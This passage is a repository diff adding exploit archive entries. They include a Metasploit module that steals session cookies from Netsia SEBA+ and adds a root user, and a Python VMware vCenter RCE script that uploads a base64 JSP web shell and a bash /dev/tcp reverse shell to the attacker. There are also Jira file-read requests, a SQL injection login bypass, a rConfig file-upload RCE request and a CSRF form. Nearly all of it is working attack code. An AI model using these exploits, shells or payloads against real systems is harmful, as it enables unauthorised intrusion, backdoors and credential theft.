conns): + global start + threading.Thread(target=timer).start() + while 1: + for i in range(1, conns + 3): + t = threading.Thread(target=attack, args=(target,port,i,)) + t.start() + if i > conns + 2: + t.join() + break + loop() + + t = threading.Thread(target=loop, args=(target, port, conns,)) + t.start() + +def timer(): + start = time.time() + while 1: + if start < time.time() + float(900): pass + else: + subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + t = threading.Thread(target=loop, args=(target, port,)) + t.start() + break + +main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb new file mode 100755 index 000000000..8d45bcaca --- /dev/null +++ b/exploits/multiple/webapps/49435.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , + 'Description' => %q{ + This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. + HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, + can be performed without the need for any session(cookie) information. + Therefore, the session cookie informations of the active users in the application can be read from the response content. + A new authorized user can be created with the obtained cookie. + }, + 'References' => + [ + [ 'CVE', '' ], + [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], + [ 'URL', 'https://www.netsia.com' ] + ], + 'Author' => + [ + 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "2021-01-06", + 'DefaultOptions' => { 'SSL' => true } + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username for your new account']), + OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) + ]) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def check + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + + rescue + return Exploit::CheckCode::Unknown + end + + if res.code == 200 and res.body.include? 'sessionId' + return Exploit::CheckCode::Vulnerable + else + if res.code == 200 and res.body.include? 'SUCCESS' + print_status("Target is vulnerable! But active admin session was not found. Try again later.") + return Exploit::CheckCode::Appears + end + end + + return Exploit::CheckCode::Safe + end + + def count_user(data, find_string) + data.scan(/(?=#{find_string})/).count + end + + def run + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + sescount = count_user(res.body,'"name"') + print_good("Currently #{sescount} active sessions have been detected.") + + cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) + puts cookies + $i = 0 + + while $i <= sescount do + sessloop = cookies[$i] + sessid = "SESSION=" + sessloop.to_s + cookie = sessid.split('"]').join('').split('["').join('') + $i +=1 + json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' + + res = send_request_raw({ + 'method' => 'POST', + 'ctype' => 'application/json', + 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), + 'cookie' => cookie, + 'data' => json_data + }) + + if res.code == 200 and res.body.include? '"SUCCESS"' + print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + break + end + end + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/50056.py b/exploits/multiple/webapps/50056.py new file mode 100755 index 000000000..528c5d1e9 --- /dev/null +++ b/exploits/multiple/webapps/50056.py @@ -0,0 +1,117 @@ +# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06/21/2021 +# Exploit Author: CHackA0101 +# Vendor Homepage: https://kb.vmware.com/s/article/82374 +# Software Link: https://www.vmware.com/products/vcenter-server.html +# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). +# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) +# CVE: 2021-21972 + +# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md + +#!/usr/bin/python2 + +import os +import urllib3 +import argparse +import sys +import requests +import base64 +import tarfile +import threading +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +myargs=argparse.ArgumentParser() +myargs.add_argument('-T','--target',help='The IP address of the target',required=True) +myargs.add_argument('-L','--local',help='Your local IP',required=True) +args=myargs.parse_args() + +def getprompt(x): + print ("(CHackA0101-GNU/Linux)$ "+ str(x)) + +def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"): + fullpath="../" * 7 + path + return fullpath.replace('\\','/').replace('//','/') + +def createbackdoor(localip): + # shell4.jsp + backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==" + backdoor = base64.b64decode(backdoor).decode('utf-8') + f = open("shell4.jsp","w") + f.write(backdoor) + f.close() + # reverse.sh + # After decoding overwrite string 'CUSTOM_IP' for local IP + shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=" + shell=base64.b64decode(shell).decode('utf-8') + shell=shell.replace('CUSTOM_IP',localip) + f=open("reverse.sh","w") + f.write(shell) + f.close() + # Move on with the payload + payload_file=tarfile.open('payload.tar','w') + myroute=getpath() + getprompt('Adding web backdoor to archive') + payload_file.add("shell4.jsp", myroute) + myroute=getpath("tmp/reverse.sh") + getprompt('Adding bash backdoor to archive') + payload_file.add("reverse.sh", myroute) + payload_file.close() + # cleaning up a little bit + os.unlink("reverse.sh") + os.unlink("shell4.jsp") + getprompt('Backdoor file just was created.') + +def launchexploit(ip): + res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) + if res.status_code == 200 and res.text == 'SUCCESS': + getprompt('Backdoor was uploaded successfully!') + return True + else: + getprompt('Backdoor failed to be uploaded. Target denied access.') + return False + +def testshell(ip): + getprompt('Looking for shell...') + shell_path="/ui/resources/shell4.jsp?cmd=uname+-a" + res=requests.get('https://' + ip + shell_path, verify=False, timeout=60) + if res.status_code==200: + getprompt('Shell was found!.') + response=res.text + if True: + getprompt('Shell is responsive.') + try: + response=re.findall("b>(.+)uname -a') + print(response) + except: + pass + return True + else: + getprompt('Sorry. Shell was not found.') + return False + +def opendoor(url): + time.sleep(3) + getprompt('Executing command.') + requests.get(url, verify=False, timeout=1800) + +def executebackdoor(ip, localip): + url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh" + t=threading.Thread(target=opendoor,args=(url,)) + t.start() + getprompt('Setting up socket '+localip+':443') + os.system('nc -lnvp 443') + +if len(sys.argv)== 1: + myargs.print_help(sys.stderr) + sys.exit(1) +createbackdoor(args.local) +uploaded=launchexploit(args.target) +if uploaded: + tested=testshell(args.target) + if tested: + executebackdoor(args.target, args.local) +getprompt("Execution completed!") \ No newline at end of file diff --git a/exploits/multiple/webapps/50380.txt b/exploits/multiple/webapps/50380.txt new file mode 100644 index 000000000..ec2bdb62b --- /dev/null +++ b/exploits/multiple/webapps/50380.txt @@ -0,0 +1,87 @@ +# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read +# Date: 2021-10-05 +# Exploit Author: Mayank Deshmukh +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/jira/download/data-center +# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 +# Tested on: Kali Linux & Windows 10 +# CVE : CVE-2021-26086 + +POC File #1 - web.xml + +GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + + +POC File #2 - seraph-config.xml + +GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC File #3 - decorators.xml + +GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + + +POC File #4 - /jira-webapp-dist/pom.properties + +GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC File #5 - /jira-webapp-dist/pom.xml + +GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC File #6 - /atlassian-jira-webapp/pom.xml + +GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC File #7 - /atlassian-jira-webapp/pom.properties + +GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1 +Host: 127.0.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/49353.txt b/exploits/php/webapps/49353.txt new file mode 100644 index 000000000..868a8b148 --- /dev/null +++ b/exploits/php/webapps/49353.txt @@ -0,0 +1,11 @@ +# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection) +# Date: 2020-12-27 +# Exploit Author: Kshitiz Raj (manitorpotterk) +# Vendor Homepage: http://egavilanmedia.com +# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/ +# Version: 1.0 +# Tested on: Windows 10/Kali Linux + +Step 1 - Go to url http://localhost/Resumes/login.html +Step 2 - Enter Username :- ' or '1'='1'# +Step 3 - Enter Password - anything \ No newline at end of file diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt new file mode 100644 index 000000000..4937fdda9 --- /dev/null +++ b/exploits/php/webapps/49665.txt @@ -0,0 +1,70 @@ +# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) +# Date: 2021-03-17 +# Exploit Author: Murat ŞEKER +# Vendor Homepage: https://www.rconfig.com +# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip +# Version: rConfig v3.9.6 +# Install scripts : +# https://www.rconfig.com/downloads/scripts/install_rConfig.sh +# https://www.rconfig.com/downloads/scripts/centos7_install.sh +# https://www.rconfig.com/downloads/scripts/centos6_install.sh +# Tested on: centOS 7 +# Notes : If you want to reproduce in your lab environment follow those links : +# http://help.rconfig.com/gettingstarted/installation +# then +# http://help.rconfig.com/gettingstarted/postinstall + +# Description: +rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'. + +The following steps can be carried out in duplicating this vulnerability. + +- Login the rConfig application with your credentials. +- Repeat + +POST /lib/crud/vendors.crud.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254 +Content-Length: 36619 +Origin: https://localhost +Connection: close +Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref +Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b +Upgrade-Insecure-Requests: 1 +Cache-Control: no-transform + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorName" + +thisisrce +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorLogo"; filename="file.php" +Content-Type: image/png + + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="add" + +add +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="editid" + + +-----------------------------122590832918963661283831488254-- + + + +- Than go to http(s):///images/vendor/file.php + +Note: The file.php can be accessed without valid credentials. + + +If you change the to + +and navigate the http(s):///images/vendor/file.php?cmd=id + +The `id` command will execute on server. \ No newline at end of file diff --git a/exploits/php/webapps/49712.html b/exploits/php/webapps/49712.html new file mode 100644 index 000000000..36dd79bbd --- /dev/null +++ b/exploits/php/webapps/49712.html @@ -0,0 +1,21 @@ +# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery +# Exploit Author: Abhishek Joshi +# Date: March 25, 2021 +# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download +# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip +# Version: 0.1 +# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 +# Tested against: Firefox 78.7.0esr (64-bit) + +# Vulnerability Description: +# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. + +## CSRF POST Form Method + +
+ + + + +
